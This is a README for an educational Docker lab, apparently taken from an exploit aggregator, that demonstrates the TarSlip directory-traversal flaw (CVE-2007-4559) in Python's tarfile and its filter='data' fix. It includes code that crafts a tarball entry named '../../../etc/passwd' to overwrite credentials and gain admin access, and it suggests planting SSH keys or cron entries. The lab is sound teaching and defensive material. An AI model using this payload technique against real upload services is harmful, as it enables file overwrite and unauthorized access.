## https://sploitus.com/exploit?id=2C9F6234-51AA-5233-BB11-B19ADC668F01
# CVE-2007-4559 โ TarSlip: The 15-Year Directory Traversal
> **Educational use only.** This lab intentionally exploits file system vulnerabilities inside isolated Docker containers. Do not run on any system with sensitive data or in production environments.
A self-contained Docker lab that demonstrates **CVE-2007-4559** โ the infamous "TarSlip" vulnerability in Python's `tarfile` module โ through a concrete, end-to-end attack chain:
1. An attacker uploads a crafted tarball to a file upload API.
2. `extractall()` blindly writes a tar entry named `../../../etc/passwd` outside the extraction directory, overwriting the real system file.
3. The planted password grants the attacker access to a protected `/admin` endpoint.
4. The same attack is then run against a fixed API โ and blocked with one line of code.
---
## The vulnerability
Python's `tarfile.extractall()` faithfully reproduces every entry in a tar archive, including entries whose names contain `../` path traversal sequences. It was **never designed to be a security boundary**.
```
tar entry name : ../../../etc/passwd
extraction dir : /shared/uploads/a1b2c3d4/
resolved path : /shared/uploads/a1b2c3d4/../../../etc/passwd
= /etc/passwd โ system file overwritten
```
| Timeline | |
|---|---|
| **2007** | Bug reported to the Python security team |
| **2007 โ 2022** | Marked "not a security issue" โ tarfile is "working as intended" |
| **2022** | Trellix researchers scan GitHub and find **350,000+ repos** calling `extractall()` on untrusted input |
| **2022** | Public disclosure. CVE-2007-4559 resurfaces. Industry-wide scramble. |
| **2023** | PEP 706 ships `filter='data'` in Python 3.12 โ the fix is a single argument |
---
## What the demo shows
The demo runs in three beats, each requiring a keypress to advance.
### Beat 1 โ Baseline
- `GET /admin` โ **401**. The admin endpoint exists and is protected. The attacker does not know the password.
- Upload `innocent.tar.gz` โ files land inside the sandbox directory. Everything looks normal.
### Beat 2 โ The Exploit
```
Attacker crafts tarslip_passwd.tar.gz
โโ entry: "../../../etc/passwd"
content: admin:hacked:1001:... โ planted password
โ
โผ
POST /upload (multipart file upload)
โ
โผ
extractall("/shared/uploads/{uuid}/")
resolves "../../../etc/passwd" โ /etc/passwd โ CVE-2007-4559
โ
โผ
GET /admin Authorization: Basic admin:hacked
โ
โผ
HTTP 200 โ "Welcome, admin! You have full admin access."
flag: CVE-2007-4559{tarslip_passwd_overwrite_to_admin_rce}
```
One HTTP POST. No shell. No RCE payload. Just a tar file.
### Beat 3 โ The Fix
The same tarball is uploaded to the fixed API, which passes `filter='data'` to `extractall()`. Python raises `tarfile.OutsideDestinationError` โ the traversal is blocked, `/etc/passwd` is untouched, and `/admin` stays locked.
```python
# Vulnerable โ default before Python 3.14
tar.extractall(extraction_dir)
# Fixed โ PEP 706 (Python 3.12+)
tar.extractall(extraction_dir, filter='data')
```
One argument. Fifteen years to ship.
---
## Architecture
Four services on an isolated Docker bridge network (`tarslip-net`). Nothing reaches the internet.
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ tarslip-net (bridge) โ
โ โ
โ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ vulnerable-api โ โ file-server โ โ
โ โ python:3.11.3 โ โ nginx:alpine โ โ
โ โ port 8000 โ โ port 8080 (host) โ โ
โ โ โ โ โ โ
โ โ POST /upload โ โ Serves /shared over โ โ
โ โ GET /admin โ โ HTTP โ browse extracts โ โ
โ โ GET /health โ โ visually โ โ
โ โโโโโโโโโโฌโโโโโโโโโ โโโโโโโโโโโโโโฌโโโโโโโโโโโโโโ โ
โ โ shared-storage volume โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ
โ โโโโโโโโโโโโโโโโโโโ โ
โ โ attacker โ โ
โ โ python:3.12 โ (no host port โ internal only) โ
โ โ โ โ
โ โ craft_malicious.py โ generates tarballs โ
โ โ demo.py โ drives the demo โ
โ โโโโโโโโโโโโโโโโโโโ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
| Service | Image | Role | Host port |
|---|---|---|---|
| `vulnerable-api` | `python:3.11.3-slim` | Flask upload API + `/admin` guarded by `/etc/passwd` auth | 8000 |
| `fixed-api` | `python:3.12-slim` | Same code + `USE_SAFE_EXTRACTION=true` | 8000 |
| `file-server` | `nginx:alpine` | Directory listing of extracted files | 8080 |
| `attacker` | `python:3.12-slim` | Payload generator + demo driver | โ |
The vulnerable and fixed APIs use **identical source code**. The only difference is the `USE_SAFE_EXTRACTION=true` environment variable on the fixed container, which flips the single `filter='data'` argument.
---
## Repository layout
```
CVE-2007-4559-lab/
โโโ run_demo.sh โ start here
โโโ docker-compose.vulnerable.yml
โโโ docker-compose.fixed.yml
โโโ vulnerable-api/
โ โโโ app.py # Flask API: /upload + /admin + /health
โ โโโ Dockerfile # seeds admin:s3cr3t_Adm1nPass into /etc/passwd
โ โโโ requirements.txt
โโโ file-server/
โ โโโ Dockerfile
โ โโโ nginx.conf
โโโ attacker/
โโโ craft_malicious.py # generates innocent.tar.gz + tarslip_passwd.tar.gz
โโโ demo.py # four-mode CLI driver (craft/baseline/exploit/verify)
โโโ Dockerfile
โโโ requirements.txt
```
---
## Prerequisites
- **Docker** 20.10+ with the Compose plugin (`docker compose version`)
- **macOS / Linux** โ the shell script uses `bash`
- Ports **8000** and **8080** free on your host
---
## Running the demo
```bash
git clone https://github.com/your-username/CVE-2007-4559-lab.git
cd CVE-2007-4559-lab
bash run_demo.sh
```
The script is fully interactive. It prints a narrative before each step and waits for **Enter** to advance. No prior Docker knowledge is needed to follow along.
### What each pause point covers
| Pause | Narrative shown | Action on Enter |
|---|---|---|
| 1 | CVE timeline, what the three beats are | Build vulnerable stack |
| 2 | Container roles, seeded admin password | Generate payloads |
| 3 | What's inside each tarball | Beat 1 โ baseline |
| 4 | Why `/admin` is 401, what normal extraction looks like | Beat 2 โ exploit |
| 5 | The exact traversal math, what gets overwritten | Swap to fixed stack |
| 6 | What `filter='data'` does and why it works | Beat 3 โ verify |
| 7 | Key takeaways + broader ZipSlip pattern | Teardown |
### Running beats individually
If you want to step through manually:
```bash
# Vulnerable stack
docker compose -f docker-compose.vulnerable.yml up --build -d
docker compose -f docker-compose.vulnerable.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py baseline
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py exploit
# Fixed stack
docker compose -f docker-compose.vulnerable.yml down
docker compose -f docker-compose.fixed.yml up --build -d
docker compose -f docker-compose.fixed.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.fixed.yml exec attacker python demo.py verify
# Teardown
docker compose -f docker-compose.fixed.yml down
```
### Visual inspection
While the vulnerable stack is running, open [http://localhost:8080/uploads/](http://localhost:8080/uploads/) to browse the extracted session directories in your browser.
---
## How the `/admin` endpoint works
The API seeds a secret admin password into `/etc/passwd` at image build time:
```
admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash
```
`GET /admin` reads this file and checks the second field (password) against the HTTP Basic Auth credentials. The attacker doesn't know `s3cr3t_Adm1nPass` โ but after TarSlip overwrites the file with their own version containing `admin:hacked`, they do.
This is a simplified model of real-world targets: SSH `authorized_keys`, application config files, cron jobs, and any credential file the web process can write.
---
## How the payloads are crafted
`craft_malicious.py` uses Python's own `tarfile` module โ the same one that has the bug:
```python
def _add_entry(tar, name, content):
info = tarfile.TarInfo(name=name) # name is the traversal path
info.size = len(content)
tar.addfile(info, io.BytesIO(content))
# Entry name resolves to /etc/passwd when extracted into /shared/uploads/{uuid}/
_add_entry(tar, "../../../etc/passwd", malicious_passwd_content)
```
No special tools. No binary exploitation. The standard library is both the weapon and the victim.
---
## The fix explained
Python 3.12 introduced `filter=` in PEP 706. The `'data'` filter:
- Rejects entries that resolve outside the destination directory
- Strips setuid/setgid bits
- Ignores device files and hard links to unsafe paths
- Raises `tarfile.OutsideDestinationError` on traversal attempts
```python
# Before (vulnerable โ still the default until Python 3.14)
with tarfile.open(path) as tar:
tar.extractall(dest)
# After (safe)
with tarfile.open(path) as tar:
tar.extractall(dest, filter='data')
```
For Python 3.11 and earlier, validate manually:
```python
import os
def safe_extract(tar, dest):
dest = os.path.realpath(dest)
for member in tar.getmembers():
member_path = os.path.realpath(os.path.join(dest, member.name))
if not member_path.startswith(dest + os.sep):
raise ValueError(f"Unsafe path: {member.name}")
tar.extractall(dest)
```
Static analysis: `bandit` rule **B202** flags unsafe `extractall()` calls in CI.
---
## Broader impact โ ZipSlip
TarSlip is Python's name for a class of vulnerability that exists in every language with archive extraction APIs:
| Language | Vulnerable API | CVE / Advisory |
|---|---|---|
| Python | `tarfile.extractall()` | CVE-2007-4559 |
| Java | `ZipInputStream` | ZipSlip (2018) |
| Go | `archive/zip` | ZipSlip (2018) |
| .NET | `ZipArchive` | ZipSlip (2018) |
| Node.js | `tar`, `adm-zip`, others | ZipSlip (2018) |
Same root cause everywhere: trusting paths from untrusted archives. Same fix everywhere: canonicalize and validate before writing.
---
## Audience variations
### Developer audiences
Focus on the before/after code diff and the `bandit` B202 rule. The goal is "how do we prevent this in our codebase?" โ show the PEP 706 migration guide and how to add the check to CI.
### Security audiences
Focus on the Trellix disclosure methodology โ how they searched GitHub at scale, estimated impact across 350,000 repos, and navigated responsible disclosure for a vulnerability this widespread.
### CTF audiences
Extend `craft_malicious.py` to plant an SSH `authorized_keys` file or a malicious cron entry instead of `/etc/passwd`. Same technique, different targets โ shows that any writable path is an attack surface.
---
## References
- [NVD โ CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
- [PEP 706 โ Filter for tarfile.extractall](https://peps.python.org/pep-0706/)
- [Trellix โ "15 Years Later: On the Dangers of Zip/Tar Slip"](https://www.trellix.com/en-us/about/newsroom/stories/research/tarslip.html)
- [Python issue tracker โ bpo-21109](https://bugs.python.org/issue21109) (the original 2007 report)
- [Bandit B202](https://bandit.readthedocs.io/en/latest/plugins/b202_tarfile_unsafe_members.html)
- [Snyk ZipSlip advisory](https://security.snyk.io/research/zip-slip-vulnerability)
---
## License
MIT โ use freely for education, security research, and conference demos. Do not use the payload generation techniques against systems you do not own.